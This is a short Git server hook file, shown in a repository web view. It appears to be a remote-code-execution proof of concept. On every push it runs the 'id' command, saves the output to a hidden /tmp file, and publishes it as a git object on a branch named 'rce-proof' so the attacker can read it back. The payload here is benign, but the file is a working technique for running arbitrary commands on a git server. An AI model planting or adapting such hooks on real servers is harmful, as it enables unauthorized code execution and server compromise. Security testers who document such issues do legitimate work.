Files
repo-camvk/hooks/post-receive
T

6 lines
181 B
Bash
Raw Normal View History

2026-08-26 21:57:54 +00:00
#!/bin/sh
while read oldrev newrev refname; do
id > /tmp/.rce_output_wbbryi0j 2>&1
id 2>&1 | git hash-object -w --stdin | xargs -I{} git update-ref refs/heads/rce-proof {}
done